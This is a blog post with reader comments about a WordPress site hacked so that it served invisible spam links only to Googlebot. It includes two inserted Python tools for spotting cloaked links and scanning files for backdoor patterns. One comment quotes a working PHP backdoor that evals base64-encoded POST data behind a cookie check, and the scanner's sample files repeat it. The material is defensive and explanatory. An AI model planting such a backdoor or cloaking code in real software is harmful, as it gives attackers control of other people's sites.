I feel exploited

Goddamnit! Someone managed, somehow, to insert malicious PHP scripts into the site which were injecting invisible spam links into my content. Even more insidiously, those links were only injected into the HTML source of the page when the browser's user agent claimed to be Googlebot, making them all but impossible to see with a normal browser.

I was lucky to notice this because in Google Webmaster Tools I still had my site address registered as www.dbzer0.com, which was wrong, as I'm not using the www. part anymore. Fortunately, however, this made the site stats show the keywords in my content instead of simply how people are linking to it, which made all the spam stand out.

Oh ouch!
WTF?

When I saw that, my first action was to do a search just to see if I was possibly looking at outdated data. Unfortunately, the results were not uplifting.

Oh shi--

This was not good. Looking at the cached copies of these pages, it was obvious that these links had existed at least since the start of February, which means that whatever is causing this was either added after my upgrade to WP 2.7 or managed to remain active through it. The source code served to Googlebot looked like this, when it should have looked like this. The links were apparently pointing to redirection scripts on a cracked Movable Type based blog. I've fired off an email to its author advising him to take the site down, but have heard nothing from him yet.

Take note, people: if you're not going to keep your site updated and patched, either take it down or export it to plain HTML and let that stand. Don't leave your obsolete PHP and MySQL setup running, as that just invites people to turn your old site into a spam haven.

At this point I started looking around the interwebs in a bit of a panic, as I hate this kind of shit being associated with me. Unfortunately, I couldn't find anything exactly like what I had. The only thing that came close was this post, which at least gave me some ideas on where to look.

I was able to discover two malicious PHP scripts residing in my wp-content folder. One was called cache.php and sat directly under /wp-content/, while the other was in /wp-content/uploads/ and had a weirder name (I can't remember it now). I summarily deleted them (although in retrospect I should probably have saved them for all of you to see), but I did notice the ironic comment inside, warning people not to copy them and pass them around.

I couldn't find anything else after that, but I was still not certain I was rid of the spam. A quick look through Googlebot's eyes (requesting the page with a Googlebot user agent) showed that the page no longer returned any spam links, but that could also be because the script doing the injecting is smart enough to recognise fake Google agents, for instance by checking that the requesting IP's reverse DNS resolves to a Google host rather than trusting the User-Agent header. The only real way to find out whether this still happens is to wait until Google indexes one of the spammed posts again and see if the spam links still appear.
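One way to run the "through Googlebot's eyes" check and make its result concrete, as an added example that is not part of the original post: fetch the same URL once with a browser User-Agent and once claiming to be Googlebot, and report every link that only the Googlebot response contains. The Googlebot User-Agent string is the one Google publishes; the sample responses at the bottom are constructed for the demonstration, not captured from dbzer0.com. As the paragraph above says, an empty result does not clear the site: a cloaking script that verifies the client IP rather than the header will serve clean HTML to this script too.

```python
"""Find links that a page serves only to Googlebot (search-engine cloaking).

Added example, not code from the original post. Compares the anchor hrefs in
two responses for the same URL: one fetched as a normal browser, one fetched
with a Googlebot User-Agent. Links present only in the Googlebot copy are
the cloaked ones.
"""
from html.parser import HTMLParser
import urllib.request

# Google's published Googlebot User-Agent; the browser string is arbitrary.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:1.9) Gecko/2008 Firefox/3.0"


class _LinkCollector(HTMLParser):
    """Collects the href of every <a> tag in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def extract_links(html):
    parser = _LinkCollector()
    parser.feed(html)
    return parser.hrefs


def cloaked_links(browser_html, googlebot_html):
    """hrefs present in the Googlebot response but absent from the browser one."""
    return sorted(set(extract_links(googlebot_html)) - set(extract_links(browser_html)))


def fetch(url, user_agent):
    """Fetch url with the given User-Agent (needs network; not used by the sample run)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.read().decode("utf-8", "replace")


def check_url(url):
    """Cloaked links for a live URL. An empty list is not proof of a clean page:
    a cloaking script that checks the client IP's reverse DNS instead of the
    User-Agent header will serve this script the clean version as well."""
    return cloaked_links(fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA))


# Constructed sample responses for an offline run (not captured from any real site).
SAMPLE_BROWSER = """<html><body><h1>A post</h1>
<p>Some text with a <a href="/about/">normal link</a>.</p>
</body></html>"""

SAMPLE_GOOGLEBOT = """<html><body><h1>A post</h1>
<p>Some text with a <a href="/about/">normal link</a>.</p>
<div style="display:none">
<a href="http://spam.example/redir.php?id=1">cheap pills</a>
<a href="http://spam.example/redir.php?id=2">cheap pills</a>
</div>
</body></html>"""

if __name__ == "__main__":
    for href in cloaked_links(SAMPLE_BROWSER, SAMPLE_GOOGLEBOT):
        print("cloaked link:", href)
```

The comparison does not care where the HTML came from, so if the live script has gone quiet you can feed it the source of Google's cached copy of a spammed post as the "Googlebot" side and the live page as the "browser" side; that is exactly the comparison that exposed the links here.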

As a precautionary measure, I also changed my WP password (as unlikely as it is that it was cracked by brute force) and looked around for anything that could help me discover this kind of thing in the future. I did find a plugin that looks very promising in this regard, but unfortunately, due to the amount of RAM it asks for and the setup of my host's PHP, I can't allocate enough memory for it to run. As a last precaution I added a search alert for these keywords appearing on my site, which will, if I get cracked again in the future, give me notice within a few days.
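For the "discover this kind of thing in the future" part, here is an added example of the kind of scan a practitioner would run over the WordPress tree by hand; it is not the plugin mentioned above and not code from the original post. It flags any PHP file under wp-content/uploads (that directory should only ever hold media, and the web server should be configured not to execute PHP from it at all), and any file, whatever its extension, containing the constructs that the scripts described in this post and in the comments below use: eval of a decoded or request-supplied payload, an md5-gated cookie check, shell execution of request data, and User-Agent cloaking on "googlebot". The sample tree it builds is constructed for the demonstration; the cookie name and hash in it are the ones quoted in the first comment.

```python
"""Scan a WordPress tree for PHP backdoor indicators.

Added example, not the original post's code and not any real plugin. Hits are
leads to read by hand, not verdicts; legitimate code occasionally matches.
"""
import os
import re
import tempfile

# Uploads should only hold media; any PHP there is suspicious on its own.
UPLOAD_DIRS = ("wp-content/uploads/",)
PHP_EXT = (".php", ".php3", ".php5", ".phtml")

# Name -> regex over the file contents. Modelled on the scripts described in
# this post and its comments (eval(base64_decode($_POST[...])), md5($_COOKIE[...])
# gate, Googlebot-only output), plus the usual web-shell constructs.
# "[^;]{0,200}" keeps a match inside one PHP statement.
INDICATORS = [
    ("eval_of_decoded_payload",
     re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("eval_of_request_data",
     re.compile(r"eval\s*\([^;]{0,200}\$_(?:POST|GET|REQUEST|COOKIE)\b")),
    ("cookie_gate_md5",
     re.compile(r"md5\s*\(\s*\$_COOKIE\s*\[")),
    ("shell_exec_of_request_data",
     re.compile(r"\b(?:system|passthru|shell_exec|exec|popen)\s*\([^;]{0,200}\$_(?:POST|GET|REQUEST|COOKIE)\b")),
    ("user_agent_cloaking",
     re.compile(r"HTTP_USER_AGENT.{0,80}googlebot", re.I | re.S)),
]


def scan_file(path, rel):
    """Indicator names that fire for one file (rel is the path relative to the root)."""
    hits = []
    if rel.startswith(UPLOAD_DIRS) and rel.lower().endswith(PHP_EXT):
        hits.append("php_in_uploads")
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            text = f.read()
    except OSError:
        return hits
    for name, pattern in INDICATORS:
        if pattern.search(text):
            hits.append(name)
    return hits


def scan_tree(root):
    """{relative_path: [indicator, ...]} for every file with at least one hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            hits = scan_file(full, rel)
            if hits:
                findings[rel] = hits
    return findings


# Constructed sample tree: one clean core file, the two kinds of script the post
# describes, a media file, and the .cache-style shell quoted in the first comment.
SAMPLE_FILES = {
    "wp-includes/functions.php":
        "<?php\nfunction wp_hello() { return 'hi'; }\n",
    "wp-content/cache.php":
        "<?php\n// do not copy and pass this around\n"
        "if (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) { echo $spam_links; }\n",
    "wp-content/uploads/2009/02/x7q.php":
        "<?php eval(base64_decode($_POST['file'])); ?>\n",
    "wp-content/uploads/2009/02/photo.jpg":
        "not really a jpeg\n",
    "wp-includes/.cache":
        "<?php if(md5($_COOKIE['1f60b26d0e9d30c0'])==\"b5472fb0f04c764e3af6d5af1c126bf2\")"
        "{ eval(base64_decode($_POST['file'])); exit; } ?>\n",
}


def build_sample_tree(base=None):
    """Write SAMPLE_FILES under base (a fresh temp dir by default); return the root."""
    root = base or tempfile.mkdtemp(prefix="wpscan-")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for rel, hits in sorted(scan_tree(root).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it with the WordPress document root as the argument (or with none to scan the constructed tree). It only finds constructs it knows about, so pair it with a recursive diff against a pristine copy of the same WordPress release, which catches a modified core file that this would miss.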

On a more positive note, hopefully by removing these huge-ass scripts (many hundreds of lines of code each) the load on my server will be reduced as well. But I'd be happy even if I simply see these keywords disappear from Webmaster Tools soon.


7 thoughts on “I feel exploited”

  1. Same thing happened to me in December. Ultimately we discovered and removed a malicious cookie in Base64 encoding, and a few other suspicious lines of code in various places in the WP directories. It looked like this, and was in the WP Functions:

    ```php
    <?php
    // Backdoor: runs only when the attacker's cookie hashes to the expected value,
    // then executes arbitrary base64-encoded PHP supplied in the POST body.
    if (md5($_COOKIE['1f60b26d0e9d30c0']) == "b5472fb0f04c764e3af6d5af1c126bf2") {
        eval(base64_decode($_POST['file']));
        exit;
    }
    ?>
    ```

    The hosting company also said, "There was also some .cache files that had the php shell inside (removed)."

    There were some other things, I think you mentioned in the mysql, etc… It was a pretty serious hack.

    It was a pain in the ass, and took a while to finally resolve everything, although my pagerank hasn't gone back to the "4" that was before.

  2. I think this is a different crack. I've seen this on the wordpress fora where it was basically everywhere and very difficult to purge manually. Fortunately I don't think I have the same thing as I didn't have the same symptoms. We'll see in the future.

    I also need to remember which UNIX command will go through my text files looking for lines of code and run it manually to see what it returns.

  3. grep? find?

    It's a pretty rude feeling getting cracked, no matter what form it takes. Hopefully no lasting damage was done.

    Sounds like the exploitation of a bug – only upgrading to a version which fixes the bug will fix the problem, as it wouldn't need passwords to operate. Post-exploit detection/scanning is at best a bandaid solution, and at worst, providing a false sense of security – really you want a solution that doesn't need any intervention, or what you really need is for the code to be safe itself. We're all too used to 'it doesn't work, upgrade/restart', but this isn't really the way it should be with software.

    It's been a long, long time since I looked at php — I still have the scars — but boy, it looks like it's ripe for abuse. Allows remote import of code? Great idea there – just what were they thinking. I am wary of anything written in php, basically because if the programmers were experienced they wouldn't be using it (there are better alternatives out there). And inexperienced programmers generally don't write secure code (no matter what language it's in, but some languages make it easier to make dangerous mistakes).

    A 2-tier web application has too many opportunities for exploitable bugs to creep in to start with, let alone with all of the additional opportunities to shoot yourself in the foot that php provides.

    1. Thanks Michael, I hope that no lasting damage was done as well (there doesn't seem to be any). The good thing about modern crackers is that they care more about profit than about damage. Thus they will keep their exploits as discreet as possible in order not to alert the owner. Thus, one gets at least a working site even while cracked.

      I think the exploit for me happened a while ago, and the scripts remained in the subsequent upgrades. Hopefully I'm not exploitable anymore but that remains to be seen.

  4. The hack was done at the server level. Same thing happened to me. Anyone hosting in Dallas/Fort Worth was a possible target. There were python scripts executed with root permissions that added code to a lot of pages.

    I'm pretty sure you got zapped with the same stuff. If you're on shared hosting, it's likely your box got rooted.

  5. Thanks Dixie, do you perchance have more information on this? I can then forward it to my provider
